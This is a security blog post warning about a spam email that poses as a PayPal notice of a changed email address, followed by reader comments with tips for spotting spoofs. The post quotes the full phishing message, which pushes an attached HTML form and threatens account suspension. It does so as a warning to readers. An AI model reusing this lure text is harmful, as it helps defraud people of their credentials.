Reason to be careful if 'PayPal' says you have changed your email address

Filed Under: Data loss, Phishing, Spam

Have you received a notification claiming that your PayPal email address has changed?

Messages like the following have been spammed out to internet users:

PayPal phishing

Subject: You have changed your PayPal email address

Attachment: Personal Profile Form - PayPal-.htm

Message body:
Dear PayPal Customer,

You have added [EMAIL ADDRESS] as a new email address for your Paypal account.

If you did not authorize this change, check with family members and others who may have access to your account first. If you still feel that an unauthorized person has changed your email, submit the form attached to your email in order to keep your original email and restore your Paypal account.

NOTE: The form needs to be opened in a modern browser which has javascript enabled (ex: Internet Explorer 7, Firefox 3, Safari 3, Opera 9)

Please understand that this is a security measure intended to help protect you and your account. We apologize for any inconvenience.

If you choose to ignore our request, you leave us no choice but to temporary suspend your account.

Sincerely, PayPal Account Review Department.

Attached to the email is an HTML form (Personal Profile Form - PayPal-.htm), that requests you enter your personal information.

Of course, the email is not really from PayPal (who would never send you an HTML form via email anyway), and any information you enter will soon be in the hands of phishing cybercriminals.

PayPal is one of the most phished brands on the internet, as unlike traditional banks it has a truly global presence increasing the chances of a scammer successfully hooking a victim when they spam out their attacks en masse.

PayPalTo its credit, PayPal offers advice about phishing on its website, and has even created a "Can you spot phishing?" challenge to help educate its users about the dangers.

The PayPal website asks that if you receive a spoof email to forward it to their security team.

Make sure that you take care when receive unsolicited emails, seemingly from PayPal. It could be that in your haste to fix a security problem you are handing your credentials over to a criminal.

, ,

You might like

9 Responses to Reason to be careful if 'PayPal' says you have changed your email address

  1. artfrankmiami · 1039 days ago

    I think another hint that it's a real email from Pay Pal is that they use your registered name in the heading. "Dear Pay Pal Member" should raise the red flags.

  2. Jonathan Hammond · 1039 days ago

    I've received several spoof PayPal messages. The most recent was telling me about a recent transaction with Skype and suggesting that I may wish to visit the Resolution Centre to challenge it. The link, of course, was phoney. But the message was very good; it really DID look like a message from PayPal.

    The first give-away, of course, was the lack of a personal salutation. Then a quick look at my account showed that there was no such transaction. I forwarded all the messages to PayPal, as they request.

    I wasn't born yesterday, so my first thought is to be suspicious. But, as I said, this was a very well-made spoof. I bet out of every hundred of the thousands or millions that are sent out one will hit home and net the scammer the details he's after.

  3. rvishu · 1039 days ago

    Another give away is poor grammar. Notice this paragraph 'If you choose to ignore our request, you leave us no choice but to temporary suspend your account.' It should have been '....temporarily' instead of temporary. Definitely unprofessional.

  4. mary edwards · 1039 days ago

    yes, and if you just forward the email to spoof@paypal.com, it can help paypal with their security.

  5. S. Emerson · 1039 days ago

    One way to combat plishing emails like this is to only use a specific email address for PayPal and other sites that need high security.

    If the notice doesn't come from that email address then it is plishing email.

    None of the banks or credit cards I deal with have an email address for me. Another precaution I take.

  6. Liz Taylor · 1039 days ago

    I've gotten these many times. Just mouse over the supposed PayPal.com link and it goes to carenchaffee.com ... not PayPal.com. Normally I just delete these but a friend just posted an article warning about the phishing to FB and the link to PayPal for reporting. Luckily I still had one of those emails in my delete box, so I just forwarded it to them. I get these things from Western Union and banks that I have no accounts in quite often. Never click on the links in the emails ... just go to the real main site and see if there are actual messages online for you.

  7. Sunny · 1028 days ago

    I haven't revived any such emails till now , Though thanks for awareness . Sunny

  8. Claire · 651 days ago

    Got an email last night, addressed to someone i have never heard of! Spoke to PAYPAL and they asked me to forward it to spoof@paypal.com If these low lifes are going to try and rip people off at least try and get the basics right!

  9. Jeremy · 509 days ago

    Spotted from a mile away with just one sentence......

    If you choose to ignore our request, you leave us no choice but to temporary suspend your account.

    Learn English first before you try to fraud people. [Expletive deleted.]

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

About the author

Graham Cluley runs his own award-winning computer security blog, and is a veteran of the anti-virus industry having worked for a number of security companies since the early 1990s. Now an independent security analyst, he regularly makes media appearances and gives computer security presentations. Send Graham an email, subscribe to his updates on Facebook, follow him on Twitter and App.net, and circle him on Google Plus for regular updates.